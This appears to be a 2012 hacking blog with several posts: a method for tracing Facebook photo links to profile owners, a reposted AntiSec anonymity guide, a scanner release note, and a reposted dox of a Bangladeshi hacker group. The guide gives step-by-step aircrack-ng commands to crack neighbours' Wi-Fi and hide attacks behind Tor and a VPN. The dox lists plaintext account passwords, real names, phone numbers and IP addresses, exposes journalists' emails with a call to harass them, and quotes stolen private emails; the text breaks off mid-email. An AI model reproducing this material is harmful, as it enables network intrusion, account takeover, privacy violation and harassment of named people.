Monday, March 26, 2012

how to find someones profile ID from photo links

i know you have some idea that in deface pages people put their photo graphs with messages or sometimes if you wanna know who uploaded this photo to facebook then open the URL of image
then see the middle number for eg for this one
www.some.fcbdn.akamahid.net/216512_204732556226334_100000687732419_582854_6270883_n.jpg etc
the highlighted one is our profile ID
then how to get info for that ID so we use facebook graph API so goto
http://graph.facebook.com/?id=  then put what you got and yes you got the user info you can simply search him/her on facebook
and if you have a URL of photo with all facebook like,tag stuff then it will look like this so the highlighted portion is your ID

photo.php?fbid=231188996914023&set=a.231188663580723.62289.100000687732419&type=3

i am also thinking same about blogger and twitter any ideas what do you say guys
this also works for pages, and profiles only

Friday, March 23, 2012

how to be a Ghost on internet by lulzsec

Its a very interesting post by lulzec members i would like to share it


Want to stay safe online?

By @AntiSecOp

Required files:VMWare Workstation:

http://www.demonoid.me/files/details/2787488/008172892720/Windows 7 Ultimate: http://www.demonoid.me/files/details/2811393/003064834770/BackTrack 5 R1 VMWare: http://www.backtrack-linux.org/ajax/download_redirect.php?id=BT5R1-GNOME-VM-32.7zpfsense: http://files.chi.pfsense.org/mirror/downloads/pfSense-2.0.1-RELEASE-amd64.iso.gzUbuntu Live CD: http://www.ubuntu.com/start-download?distro=desktop&bits=32&release=latest


Required Hardware:
Virtualization supported CPU
4GB RAM
USB wifi adapter supporting packet injection:http://www.amazon.com/Alfa-802-11b-Wireless-Original-9dBi/dp/B001O9X9EU/ref=sr_1_2?ie=UTF8&qid=1328768355&sr=8-2


VPN Account without paper trail
  • Purchase prepaid visa card with cash
  • Purchase Bitcoins with Money Order
  • Donate Bitcoins to different account
  • Purchase VPN account with bitcoins


VPN ServicesoVPN.to
  • www.CCHeaven.in
  • https://www.vpntunnel.se/ 
  • https://www.ipredator.se/?lang=en 
  • http://strongvpn.com/



Step One
  • Enable Boot and Setup page BIOS password
  • Turn computer on, press key to enter Setup. Usually F1, F2, F11, Del, something similar. Then go to the Security tab


Step Two
  • Boot Ubuntu LiveCD to cleanly wipe hard drive
  • After booting LiveCD, open up terminal and type sudo "fdisk -l" to get a list of disks and partitions
  • Use the wipe command on each partition that is listed with the above commandie "sudo wipe /dev/sda1"
  • Repeat for each drive (sdb, sdc) and each partition (sda1, sda2)
  • Reboot


Step Three
  • Install Windows 7 Ultimate and shred free space
  • Boot from Windows disk and install
  • After clean install, install fileshredder http://www.fileshredder.org
  • Run fileshredder using "Secure Erasing Algorithm with 7 passes"Reboot
  • Enable BitLocker drive encryption. Safe key to USB stick
  • Reboot
  • Run Windows Update
  • Turn off Swap space (Control Panel > System and Security > Advanced > Performance > Disable Virtual Memory
  • Reboot


Step Four
Install VMWare  


Step Five
  • BackTrack 5 R1 Virtual Machine to be used for cracking WiFi
  • Open VMWare and import the BackTrack 5 R1 VMWare image (link above)
  • Set VM to 256MB RAM
  • Create a Network Adapter (VMNet0)
  • Directly attach USB wifi adapter (VM > Removable Devices > Check Wireless Adapter)
  • Bridge eth0 to wlan0

Easy Mode method:
  • apt-get -y install network-manager
  • rm /etc/network/interfaces
  • reboot
  • Open Network Manager
  • eth0 IPv4 Settings > Method > Shared to other computers

  • Use aircrack-ng to crack surrounding AP's
  • airmon-ng stop wlan0
  • ifconfig wlan0 down
  • macchanger --mac 00:11:22:33:44:55 wlan0
  • airmon-ng start wlan0
  • airodump-ng wlan0
  • Get SSID and channel for next step
  • airodump-ng -c (channel #) -w (file name) --bssid (bssid) wlan0
  • Let this sit until you have plenty of data points
  • aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) wlan0
  • Look for successful ACK
  • aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 wlan0
  • Also let this run for a while, look for 10k ACK's aircrack-ng -b (bssid) (file name-01.cap)
  • Connect to SSID


Step Six
  • Pfsense install to use VPN
  • 8 GB of Hard Drive space
  • 256MB RAM
  • Two Network Adapters (VMnet0 and VMnet1)
  • After installing from the downloaded ISO, set WAN to VMnet0 and LAN to VMnet1. You should get a WAN dhcp IP from VM#1
  • Assign LAN IP and enable DHCP (192.168.1.1/24)

Step Seven
  • Install TorBox to anonymize ALL traffic
  • 128MB RAM
  • 5GB Hard Drive space
  • One Network Adapter (VMnet1)
  • Follow Torproject.org instructions for TorBox https://trac.torproject.org/projects/tor/wiki/doc/TorBOX
  • Open a browser and go to http://192.168.1.1
  • Login to pfsense with admin/pfsense and change password, force https, and enable all logging
  • Go to PPTP VPN Tab and input info from VPN info above


Step Eight
  • BackTrack 5 R1 VM for all cracking/penetration testing/everything
  • Import another BT5 vmware image
  • 512MB RAM
  • One Network Adapter (VMnet1)
  • Set default Gateway to match the IP of your previous VM (TorBox)
  • ALL data will now travel securely (BT5 > Tor Network > Over VPN > Internet using cracked wifi)
  • Download Tor Bundle from torproject.org
  • Use FireFox Portable bunlded with Tor Bundle (more secure)
  • All exploiting/penetration testing, cracking, etc is done on this VM


Step Nine
Encrypt All VM's
Open settings for Each VM in VMWare
Under Options > Enable Encryption
Set secure password

Torchat: OfflineE-mail: antisec@tormail.net

Twitter: https://twitter.com/AntiSecOp

SSL scanner SSLyze ver 0.4 released

Updated to ver 0.4
SSLyze is a stand-alone Python application that looks for classic SSL mis-configurations, while providing the advanced user with the opportunity to customize the application via a simple plugin interface. Better, faster scanner to analyze the configuration of SSL servers.
*. Supports cipher suites scanning, insecure renegotiation verification, session resumption testing, clientcertificates, and more…
*. Tested on Python 2.6 & 2.7 with Ubuntu and Windows 7, both 32 and64 bits. Might work on other platforms as well.
*. Based on OpenSSL and acustom SSL Python wrapper.
Official change log for SSLyze v0.4:
*. Support for OpenSSL 1.0.1 and TLS 1.1 and 1.2 scanning. See –tlsv1_1 and –tlsv1_2 .
*. Support for HTTP CONNECT proxies. See –https_tunnel .
*. Support for StartTLS with SMTP and XMPP. See –starttls .
*. Improved/clarified output.
*. Various bug fixes.

Download SSLyze:
http://code.google.com/p/sslyze/downloads/list

Thursday, March 22, 2012

#OccupyOS linux for activists

Well this time i have found a modified version of tails linux (tor) for activists for occupy movements via OpPinkPower
occupyOS is a specialized Linux distribution designed to provide a secure environment activists can use to edit and publish documents, browse the web (manage site, twitter, and facebook pages), and securely communicate both on the ground and with the outside world. It was designed with security and usability in mind.
NOTE: occupyOS is still under heavy development and an official stable release has not been made.
Features
Highlights include anonymous web browsing and internet access (using Tor or VPN's), encrypted voice chat and conferencing (using Mumble), encrypted instant messaging (with Pidgin-OTR and Xchat-OTR), advanced image editing (with GIMP), and a secure hard drive wiping tool. And many more
website=>http://wiki.gitbrew.org/wikibrew/OccupyOS
take care with this one als o play saf3

Saturday, March 17, 2012

BBHH hackers Doxed by mickey mouse

seems like there is someone else who is not happy with this india-bangladesh cyber war......
team mickey mouse Doxed all their infos online 
here is the D0x
,n888888n,
       .8888888888b
       888888888888nd8P~''8g,
       88888888888888   _  `'~\.  .n.
       `Y888888888888. / _  |~\\ (8"8b
      ,nnn.. 8888888b.  |  \ \m\|8888P
    ,d8888888888888888b. \8b|.\P~ ~P8~
    888888888888888P~~_~  `8B_|      |
    ~888888888~'8'   d8.    ~      _/
     ~Y8888P'   ~\ | |~|~b,__ __--~
 --~~\   ,d8888888b.\`\_/ __/~
      \_ d88888888888b\_-~8888888bn.
        \8888P   "Y888888888888"888888bn.
     /~'\_"__)      "d88888888P,-~~-~888
    /  / )   ~\     ,888888/~' /  / / 8'
   (  / / / |) )   /   '"88(/ ~  / /  |
    (       /_/  /~        \( _/      /
     (_(_ ( /~~\/      ,  O,/~\___/_/'
         ~~~    |       \_  (
                )(        \_|  -- Mickey Mouse Hacking House (2012)
           __--~"mb  ,g8888b.
         _/    8888b(.8P"~'~---__
        /       ~~~| / ,/~~~~--, `\
       (       ~\,_) (/         ~-_`\
        \  -__---~._ \             ~\\
        (           )\\              ))
        `\          )  "-_           `|
          \__    __/      ~-__   __--~
             ~~"~             ~~~
 
                    Flames: mickeymousehh@yahoo.com
 
 _____   _____    _____   _   _   _____   _      __    __
|  _  \ |  _  \  /  _  \ | | | | |  _  \ | |     \ \  / /
| |_| | | |_| |  | | | | | | | | | | | | | |      \ \/ /
|  ___/ |  _  /  | | | | | | | | | | | | | |       \  /
| |     | | \ \  | |_| | | |_| | | |_| | | |___    / /
|_|     |_|  \_\ \_____/ \_____/ |_____/ |_____|  /_/
 _____   _____    _____   _____   _____   __   _   _____   _____  
|  _  \ |  _  \  | ____| /  ___/ | ____| |  \ | | |_   _| /  ___/ 
| |_| | | |_| |  | |__   | |___  | |__   |   \| |   | |   | |___  
|  ___/ |  _  /  |  __|  \___  \ |  __|  | |\   |   | |   \___  \ 
| |     | | \ \  | |___   ___| | | |___  | | \  |   | |    ___| | 
|_|     |_|  \_\ |_____| /_____/ |_____| |_|  \_|   |_|   /_____/ 
 
 
 ____   ____   __ __  __ __      _        ___   ____  __  _ 
|    \ |    \ |  T  T|  T  T    | T      /  _] /    T|  l/ ]
|  o  )|  o  )|  l  ||  l  |    | |     /  [_ Y  o  ||  ' / 
|     T|     T|  _  ||  _  |    | l___ Y    _]|     ||    \ 
|  O  ||  O  ||  |  ||  |  |    |     T|   [_ |  _  ||     Y
|     ||     ||  |  ||  |  |    |     ||     T|  |  ||  .  |
l_____jl_____jl__j__jl__j__j    l_____jl_____jl__j__jl__j\_j
    Bangladesh BlackHat Hackers (pwnage for fun and profit)
          ... because we know how to LoL
 
  Team BBHH (ph33r u5):
 
    * Optimus BlackBurn
    * BD Xtor
    * Orions Hunter
    * Black Bone
    * BD Shell (duplicate a/c of BD Xtor, Plan B against pwnage)
    * Angel Irine (Optimus BlackBurn in cross dressing mode)
    * Rotating Rotor
 
 
[[------ Table of Contents ------]]
 
  [*] Introduction
  [*] (un)Anonimization
  [*] Life Style of the pwned and lamest with: BD XTOR
  [*] Dox Dropping Contest
 
[[-------------------------------]]
 
  [[ *** Random Quotes ***]]
 
  Optimus BlackBurn (5:33pm Mar 11):
  """
    Taile Apne e Bolen, Apner Recover Option e bdblahat4@gmail.com Deoa Roice, 
    It's Eassy To Hack bdblaht4@gmail.com When he Get Your mail Address
    Apnei Bujhte Parsen Taile Kamne Paice bdblackhat4@gmail.com er Pass
  """
 
    Don't be too sure BBM "bro", may be you are pwned too.
 
   ****** BLACKBURN-PC__BLACK BURN *******
   -----------------------------------------------------
   Volume in drive C has no label.
   Volume Serial Number is B885-33A0
 
   Directory of C:\
 
  03/02/2012  01:25 PM             1,024 .rnd
  06/11/2009  03:42 AM                24 autoexec.bat
  05/12/2009  04:12 PM             2,832 backdoor.pl
  05/12/2009  04:12 PM             2,105 bc.pl
  05/12/2009  04:12 PM             1,117 bindshell.pl
  02/01/2012  09:36 AM             6,576 bootsqm.dat
  06/11/2009  03:42 AM                10 config.sys
  01/22/2012  08:53 PM             4,525 debug1214.txt
  11/28/1997  02:48 PM            12,039 doexec.c
  07/09/1996  04:01 PM             7,283 generic.h
  11/06/1996  10:40 PM            22,784 getopt.c
  11/03/1994  07:07 PM             4,765 getopt.h
  02/06/1998  03:50 PM            61,780 hobbit.txt
  11/28/1997  02:36 PM               544 makefile
  01/03/1998  02:37 PM            59,392 nc.exe
  01/04/1998  03:17 PM            69,081 NETCAT.C
  09/02/2010  07:20 AM               618 NetworkCfg.xml
  07/14/2009  08:37 AM    <DIR>          PerfLogs
  03/02/2012  03:30 AM    <DIR>          Program Files
  09/09/2010  10:30 AM             9,345 pyloris.py
  03/02/2012  05:03 AM    <DIR>          Python25
  02/08/2012  03:59 AM    <DIR>          Python27
  02/08/2012  03:16 AM    <DIR>          Python32
  03/02/2012  04:55 AM    <DIR>          Setup
  01/21/2012  07:09 PM    <DIR>          Users
  02/29/2012  03:31 PM    <DIR>          Windows
                18 File(s)        265,844 bytes
                 8 Dir(s)   2,315,337,728 bytes free
   Volume in drive D is Black Burn
   Volume Serial Number is 00D3-2A3F
 
  Directory of D:\
 
  01/28/2012  11:30 PM            13,146 .xml
  03/01/2012  01:03 AM    <DIR>          Audio
  02/01/2012  09:39 AM             6,288 bootsqm.dat
  02/09/2012  01:09 PM            30,459 Chrome Book Mark.html
  03/02/2012  06:17 AM    <DIR>          Downloads
  02/25/2012  10:05 PM    <DIR>          India Secret
  02/25/2012  03:46 AM    <DIR>          India Secret 2
  02/28/2012  01:46 PM            11,482 Lans.xml
  03/01/2012  10:02 PM    <DIR>          Metasploit
  02/28/2012  01:27 PM    <DIR>          netscan
  02/28/2012  01:26 PM         1,984,929 netscan.zip
  02/28/2012  09:21 PM    <DIR>          Pictures
  03/02/2012  05:01 AM    <DIR>          Program Files
  02/27/2012  01:37 AM    <DIR>          Software
  01/21/2012  07:08 PM    <DIR>          usr
  01/28/2012  04:02 AM    <DIR>          xampp
                 5 File(s)      2,046,304 bytes
                11 Dir(s)  13,645,021,184 bytes free
 
 
[[---------- Introduction ----------]]
 
  """
  We are Bangladesh Black Hat Hackers.
  We are Anonymous.
  We are Legion.
  We don't forget.
  We don't forgive.
  """"
  p.s: We are idiots ! :PpppPPpp
 
  ^^ This is how it all started. A bunch of wannabe script kids with 
  L00k m4 m3 4 31337 h4x0r .. cyber war .. judhdho .. joy bangla.. lolzz
 
  The BBHH group consists of a bunch of idiots from Bangladesh some of whom are
  living abroad in France, Italy etc with a feeling of invincibility and
  political correctness, something which is quite common in an immature society
  such as Bangladesh. The group started with the common objective of ego
  satisfaction and hactivism against India, protesting against Indian Border
  Security Force doing its job of stopping illegal immigrants from Bangladesh to
  cross over to India, which for some reason has pissed off the Bangladeshis who
  seem to be considering illegal immigration to India as their birth right.
 
  Nevertheless, these BBHH kiddie operations brought decent media attention
  particularly in Bangladesh which was probably dieing for an oppurtunity for
  spreading anti-Indian propaganda. The amazing mumbling blind sheeps of Bangla
  Land followed their new found heroes on Facebook  and created an interesting
  social uprising with a common cause, no matter how twisted or disoriented or
  hypocritic it is.
 
  The amazing ability of the blind sheeps to "Like" a facebook post no matter
  how insulting it is for them is really amusing and lol'able. When BBHH's
  facebook fan page was pwned and their private info was being leaked, hordes
  and hordes of brainless followers "Liked" the post in no time. We really love
  you all for that.
 
 
[[---------- (un)Anonimization ---------]]
 
  bangladeshblackhathacker@gmail.com
  crewbbhh
 
  banglaleaks.bbhh@gmail.com
  crewbbhh333
 
  http://banglaleaks-bbhh.blogspot.com/
  banglaleak.bbhh@gmail.com
  crewbbhh333
 
  http://bdblackhat-news.blogspot.com/
  bangladeshblackhathacker@gmail.com
  crewbbhh
 
  http://www.zone-h.org/login
  BANGLADESH BLACK HAT
  crewbbhh
 
  https://twitter.com/#!/BDblackHat
  bangladeshblackhathacker@gmail.com
  bbhh1913090701
 
  bdblackhat4@gmail.com
  cyberblackbd
 
  Skype:  videomotions (contributed by Yousuf Ahmed, read below!)
          thankyou123
 
[[-------- Media Whores -----------]]
 
  Some media personnels (so called journalists) contacted the BBHH Team and
  praised them for their anti-indian activity and encouraged them in their
  criminal conducts:
 
    [*] Adnan Firoze
      [*] <adnan.firoze@gmail.com>
      [*] Dhaka Courier & United News of Bangladesh
 
    [*] Syed Tashfin Chowdhury
      [*] <tashfinster@gmail.com>
      [*] New Age
 
    [*] Ahsan Kabir
      [*] <ahsan.akraza@gmail.com>
      [*] Output Editor
 
    [*] Zahirul Islam (haha!)
      [*] <zahir375@gmail.com>
      [*] Some Private University
 
    [*] Yousuf Ahmed
      [*] <tuhin1111@gmail.com>
      [*] THE ONE who shall protect BBHH from RAB (or so does he claim!)
      [*] Donates Skype account with credit to kiddies for kiddie activities
 
 
  Somebody please mail them and tell them what you really feel about them
  supporting cyber crime.
 
[[---- Life Style of the pwned and lamest with: BD XTOR ----]]
 
  Helloooo everybody and welcome to the `Life style of the pwned and THE 
  LAMEST`. Our special guest today is the ultra elite h4x0r who loves wearing a
  Black HAT .. who calls himself BDXtor (at least till his facebook and mail a/c
      got pwned).
 
  **claps** **claps** **claps**
 
  MMHH: Thank you BDXtor for honoring us with your presence..
  BDXtor: no probz bro.. always ready for some media whoring.. 
  BDXtor: .. btw. never been pwned!
  
  MMHH: So, tell us briefly about your background and how you got introduced to
  h4x0r1ng ?
 
  BDXtor: bro, I born and brought up in small village on Dhaka in
  Bangladesh and I a gifted kid I quickly learned all the Bengali
  slangs and by time I was 12, I was writing propaganda material for various
  local mullahs. I know at least 31337 unique slangs and my notep4d has at least 50
  different ways of saying "Fuck You".. 
 
  BDXtor: .. btw. never been pwned!
  BDXtor: fine day one I is introduced to a computer nd ev3r since I
  h4x0r3d. While other stupeed k1ds play video games, i hack i hack !!!!!!!
 
  MMHH: Please tell us about your favourite hacking tool.
  BDXtor: Havij ! Is there a world outisde havij ?
 
  MMHH: Who is Rupa and how is Esha ?
  BDXtor: WHAT !!??!! WTF !!??!! shaala kutta lath marum tore..
 
  MMHH: err... uhmm uh.. never mind. 
  MMHH: Please show us your h4x0r1ng example?
 
  BDXtor: Sure.. http://oi39.tinypic.com/fx4du.jpg
  BDXtor: Here I h4ck some stupid site.. 
 
  MMHH: Please tell us your commonly used password..
  BDXtor: huh? gadha naki? who asks question like this? 
 
  MMHH: Come on dude, its an open secret now. Almost everybody and their dogs
  will be knowing some of your passwords.. 
 
  BDXtor: hoise hoise.. its "rupaesha" with h4x0r verbs in head and tale..
 
  MMHH: Thank you BDXtor for spending time with us. We hope you enjoy your lamering
  day in and day out and keep wasting your time. Please don't commit suicide
  "bro".
 
  Some more pics for your readers:
 
  http://oi42.tinypic.com/sauv75.jpg
  http://oi42.tinypic.com/34ypu2a.jpg
  http://oi42.tinypic.com/elcubd.jpg
 
 
[[--------------- Dox Dropping Contest ------------------------]]
 
  Dear readers, we really need your contribution here. Please send your
  contributions for the next release.
 
  Till then enjoy!
 
    ** BdXtor **
 
    AKA:                        BD Shell
    AKA:                        Master Mind
 
    Real Name:                  Unknown Idiot
    Nationality:                Bangladeshi
    Country of Residence:       Italy
    Last known IP:              2.38.102.162
    E-Mail:                     xtorhacker@yahoo.com
    E-Mail:                     cyb3rgangst3r@gmail.com
    Phone:                      +39-3275329256
 
    ** Optimus BlackBurn **
 
    AKA:                        Angel Irine
 
    Real Name:                  Jannatul Nayeem
    Nationality:                Bangladeshi
    Country of Residence:       Bangladesh
    Last known IP:              180.211.191.62
    E-Mail:                     dj.moonlit@gmail.com
    E-Mail:                     dj.moonlit@yahoo.com
    Phone:                      +880-1919834692
    Phone:                      +880-1681360804
    Phone:                      +880-1829649615
 
    ** Back Bone **
 
    Real Name:                  Mamun
    Nationality:                Bangladeshi
    Country of Residence:       Singapore
    E-Mail:                     backbone65@yahoo.com
    Phone:                      +65-98949788
 
 
[[---------- EXTRA: Mailbox Glimpse -----------]]
 
 
Delivered-To: bangladeshblackhathacker@gmail.com
Received: by 10.68.62.74 with SMTP id w10csp1667pbr;
        Sun, 19 Feb 2012 04:21:17 -0800 (PST)
Return-Path: <adnan.firoze@gmail.com>
Received-SPF: pass (google.com: domain of adnan.firoze@gmail.com)
Authentication-Results: mr.google.com; spf=pass 
Received: from mr.google.com ([10.204.152.193])
        by 10.204.152.193 with SMTP id h1mr7005302bkw.85.1329654075320 (num_hops = 1);
        Sun, 19 Feb 2012 04:21:15 -0800 (PST)
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;
        d=gmail.com; s=gamma;
        h=mime-version:date:message-id:subject:from:to:content-type;
        bh=4mkjDbc6M51vCHqEelRhGL6xRfnZgz58b94B2DvXH1A=;
        b=FxuT5JL+CGxP6+4o9AZwxgNm94tqw86qTYTAL3of7f8L21d3gCOscysbxqKK1/HPMi
         YRBmZHV8dzfzk+eqHu2ttFOy0Utv6XrfvPsz8TdpX2zRDqAR4IsKHFm4YHl9nmKr/IzO
         Tdt0IBYbAnocbCegGb5gjkC/fmDKiJmc4ob2s=
MIME-Version: 1.0
Received: by 10.204.152.193 with SMTP id h1mr7005302bkw.85.1329654075301; Sun,
 19 Feb 2012 04:21:15 -0800 (PST)
Received: by 10.205.37.73 with HTTP; Sun, 19 Feb 2012 04:21:15 -0800 (PST)
Date: Sun, 19 Feb 2012 18:21:15 +0600
Message-ID: <CALvk12K2hMn=O97TP6_i=kfpu5nkT5eQMRTgVResSJz+XsVybQ@mail.gmail.com>
Subject: From Dhaka Courier and United News Bangladesh
From: Adnan Firoze <adnan.firoze@gmail.com>
To: bangladeshblackhathacker@gmail.com
Content-Type: multipart/alternative; boundary=0015175d079ad51fde04b9503654
 
--0015175d079ad51fde04b9503654
Content-Type: text/plain; charset=ISO-8859-1
 
Dear Sir
 
Assalamualaikum.
 
Firstly accept our greetings and appreciation of your work.
 
*Now let me turn to the main subject. As you have seen that ATN News has
wrongfully portrayed a  hacker "Code Red" who had very little idea about
hacking. We request you to give us some of the responses for the following
queries becuase we are doing a cover story on "Black Hat Hackers" - from a
neutral yet POSITIVE standpoint. Just to let you know, are also against the
actions of India and people like Mustafa Jabbar. It would be great if you
answer the following (in Bangla or English whichever you like):*
 
1. How did this idea of attacking Indian sites come about?
2. How did you form a community/How did you meet?
3. What kind of age group are you guys from?
4. Do you have any response to give out to the media to protest the ATN
news report?
5. Do you want any other message of invitation or encouragement to the mass
readers?
6. What is the difference between defacing and DDOS attacks?
7. Which "hack" do you people tend to think to be your most successful one?
8. Why are you not afraid of legal actions or do you cover your tracks
properly?
9. We have heard numerous foreign hacking groups are supporting Bangladesh
in this war,. Why do you think they are supporting and which countries are
generally supporting you?
 
*We would be grateful if you would kindly reply to the questions above and the
story will be published next Friday (Feb 24). Your co-operation will be
highly appreciated and we will do our best to get your message across to
general people. *
 
Regards
 
Adnan Firoze
Staff Writer
Dhaka Courier & United News of Bangladesh
http://www.unbconnect.com/about-us
http://www.dhakacourier.com.bd/
 
--0015175d079ad51fde04b9503654
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
 
Dear Sir<br><br>Assalamualaikum.<br><br>Firstly accept our greetings and ap=
preciation of your work. <br><br><b>Now let me turn to the main subject. As=
 you have seen that ATN News has wrongfully portrayed a=A0 hacker &quot;Cod=
e Red&quot; who had very little idea about hacking. We request you to give =
us some of the responses for the following queries becuase we are doing a c=
over story on &quot;Black Hat Hackers&quot; - from a neutral yet POSITIVE s=
tandpoint. Just to let you know, are also against the actions of India and =
people like Mustafa Jabbar. It would be great if you answer the following <=
u>(in Bangla or English whichever you like)</u>:</b><br>
<br>1. How did this idea of attacking Indian sites come about?<br>2. How di=
d you form a community/How did you meet?<br>3. What kind of age group are y=
ou guys from?<br>4. Do you have any response to give out to the media to pr=
otest the ATN news report?<br>
5. Do you want any other message of invitation or encouragement to the mass=
 readers?<br>6. What is the difference between defacing and DDOS attacks?<b=
r>7. Which &quot;hack&quot; do you people tend to think to be your most suc=
cessful one?<br>
8. Why are you not afraid of legal actions or do you cover your tracks prop=
erly?<br>9. We have heard numerous foreign hacking groups are supporting Ba=
ngladesh in this war,. Why do you think they are supporting and which count=
ries are generally supporting you?<br>
<br><b>We would be grateful if you would kindly reply to the questions abov=
e and <u>the story will be published next Friday (Feb 24)</u>. Your co-oper=
ation will be highly appreciated and we will do our best to get your messag=
e across to general people. </b><br>
<br>Regards<br><br>Adnan Firoze<br>Staff Writer<br>Dhaka Courier &amp; Unit=
ed News of Bangladesh<br><a href=3D"http://www.unbconnect.com/about-us">htt=
p://www.unbconnect.com/about-us</a><br><a href=3D"http://www.dhakacourier.c=
om.bd/">http://www.dhakacourier.com.bd/</a><br>
 
--0015175d079ad51fde04b9503654--
 
 
                                                                                                                                                                                                                                                               
Delivered-To: bangladeshblackhathacker@gmail.com
Received: by 10.68.130.42 with SMTP id ob10csp16250pbb;
        Wed, 7 Mar 2012 05:49:00 -0800 (PST)
Return-Path: <tashfinster@gmail.com>
Received: from mr.google.com ([10.180.83.198])
        by 10.180.83.198 with SMTP id s6mr4033200wiy.8.1331128138391 (num_hops = 1);
        Wed, 07 Mar 2012 05:48:58 -0800 (PST)
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;
        d=gmail.com; s=20120113;
        h=mime-version:in-reply-to:references:date:message-id:subject:from:to
         :content-type;
        bh=mXyJHAvZIbdOD/gqTF9efPbzDtlrRurFImkduDTIi20=;
        b=Omz8sxNtdVwpyX3i1kIdE9nBn80CuUI0qjZGLW+JneMZpB68VZAIS2mRtIE+nzuMCA
         oiwP+5+sy2iaIzZ3j/kVK8b3ChZfLXb4JjbLVffRRF216hpEe6FDlJCghY/r1LPg4P4X
         1xKKTuPR1Fu+CI36ykKk5NT2B50lnRFdoLEpZGoCEgcH7TT2aCUJh+zjVXduA3xdC2uV
         WW5aVC9XFKWYvYuwCs02wa2+n2DeT7UiDzbwOEHlXNEhGPDRzbyf45qsemx44iI+sles
         /fFAqDIOxMrzgNnlaKOwPrxg1DorLBCRPGxv3h+jIT42LJvZlqQZRmg7DPMn/9392bOM
         mNug==
MIME-Version: 1.0
Received: by 10.180.83.198 with SMTP id s6mr4033200wiy.8.1331128138386; Wed,
 07 Mar 2012 05:48:58 -0800 (PST)
Received: by 10.216.26.3 with HTTP; Wed, 7 Mar 2012 05:48:58 -0800 (PST)
In-Reply-To: <CACRs5pGAi5oto9gzJBXAHrws16G9sdgp3ptWOU+tbiKvsd=W0Q@mail.gmail.com>
References: <CADUAQf2aYU12zqazEvmC5JYn4pNWS6UgozpVA5aM_GQOq4-Lxg@mail.gmail.com>
        <CADUAQf0tQDruWXgoBbU66PM21E+MuiZ0yXQhHny4drSZpzZErA@mail.gmail.com>
        <CACRs5pGAi5oto9gzJBXAHrws16G9sdgp3ptWOU+tbiKvsd=W0Q@mail.gmail.com>
Date: Wed, 7 Mar 2012 19:48:58 +0600
Message-ID: <CADUAQf03SNzjh=1ev9H0K782rfKHSUkwv5qWQmOF-2ZtWX2nJA@mail.gmail.com>
Subject: Re: A few questions from a journalist
From: tashfinster@gmail.com
To: bangladeshblack hathacker <bangladeshblackhathacker@gmail.com>
Content-Type: multipart/alternative; boundary=f46d0442726cd6cdff04baa76b6f
 
--f46d0442726cd6cdff04baa76b6f
Content-Type: text/plain; charset=ISO-8859-1
 
Dear Bd Xtor,
Thanks for your email. I have included the information in a cover story of
New Age's Xtra magazine. The magazine will be on sale from March 9.
 
I may need more info from you later, as I may have to do another piece for
some international news organization.
 
Thanks a lot for the info.
 
Tashfin
 
On Wed, Mar 7, 2012 at 5:19 AM, bangladeshblack hathacker <
bangladeshblackhathacker@gmail.com> wrote:
 
> Dear sir Hope you doing well.sory for long lolng delay.cyberwar 2 declear
> from indian site and we all declear war aginst them.today bbhh hacked more
> then 100 indian site.you can find all website list in attach file.all
> bangladeshi hackers group fighting on this war.and totall count near about
> 30 thousend.sory for bad english.if you want more infor let me know.
>
> thanks
> bd xtor
>
> On Fri, Feb 24, 2012 at 6:33 AM, <tashfinster@gmail.com> wrote:
>
>> Dear hackers,
>>
>> I am an editor of the Daily New Age and want to do a piece on the hacking
>> that the three groups have done.
>>
>> I had sent an email to you all earlier. But you guys just sent me back an
>> email.
>>
>> I am sending some questions now. Can one of please answer these and send
>> them back.
>>
>> 1.) What is the total number of Indian websites that you have hacked till
>> date?
>>
>> 2.) Is the cyber war still going on?
>>
>> 3.) Most newspapers and Indian media, especially, claim that you have
>> support and involvement of a number of international hacking groups. How
>> far is this true?
>>
>> 4.) Are you guys in anyway connected to Anonymous?
>>
>> 5.) Are Bangladesh government forces trying to crack down on you people
>> now?
>>
>> Thanks a lot.
>>
>>
>> --------------------
>> Syed Tashfin Chowdhury
>> Editor, Xtra
>> New Age
>>
>>
>
 
--f46d0442726cd6cdff04baa76b6f
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
 
Dear Bd Xtor,<div>Thanks for your email. I have included the information in=
 a cover story of New Age&#39;s Xtra magazine. The magazine will be on sale=
 from March 9.</div><div><br></div><div>I may need more info from you later=
, as I may have to do another piece for some international news organizatio=
n.</div>
<div><br></div><div>Thanks a lot for the info.</div><div><br></div><div>Tas=
hfin</div><div><br><div class=3D"gmail_quote">On Wed, Mar 7, 2012 at 5:19 A=
M, bangladeshblack hathacker <span dir=3D"ltr">&lt;<a href=3D"mailto:bangla=
deshblackhathacker@gmail.com">bangladeshblackhathacker@gmail.com</a>&gt;</s=
pan> wrote:<br>
<blockquote class=3D"gmail_quote" style=3D"margin:0 0 0 .8ex;border-left:1p=
x #ccc solid;padding-left:1ex">Dear sir Hope you doing well.sory for long l=
olng delay.cyberwar 2 declear from indian site and we all declear war agins=
t them.today bbhh hacked more then 100 indian site.you can find all website=
 list in attach file.all bangladeshi hackers group fighting on this war.and=
 totall count near about 30 thousend.sory for bad english.if you want more =
infor let me know.<br>
 
<br>thanks<br>bd xtor <br><div class=3D"HOEnZb"><div class=3D"h5"><br><div =
class=3D"gmail_quote">On Fri, Feb 24, 2012 at 6:33 AM,  <span dir=3D"ltr">&=
lt;<a href=3D"mailto:tashfinster@gmail.com" target=3D"_blank">tashfinster@g=
mail.com</a>&gt;</span> wrote:<br>
<blockquote class=3D"gmail_quote" style=3D"margin:0 0 0 .8ex;border-left:1p=
x #ccc solid;padding-left:1ex">
<div class=3D"gmail_quote">Dear hackers,<div><br></div><div>I am an editor =
of the Daily New Age and want to do a piece on the hacking that the three g=
roups have done.</div><div><br></div><div>I had sent an email to you all ea=
rlier. But you guys just sent me back an email.</div>
 
 
 
<div><br></div><div>I am sending some questions now. Can one of please answ=
er these and send them back.</div><div><br></div><div>1.) What is the total=
 number of Indian websites that you have hacked till date?</div><div><br>
 
 
 
</div><div>2.) Is the cyber war still going on?</div><div><br></div><div>3.=
) Most newspapers and Indian media, especially, claim that you have support=
 and involvement of a number of international hacking groups. How far is th=
is true?</div>
 
 
 
<div><br></div><div>4.) Are you guys in anyway connected to Anonymous?</div=
><div><br></div><div>5.) Are Bangladesh government forces trying to crack d=
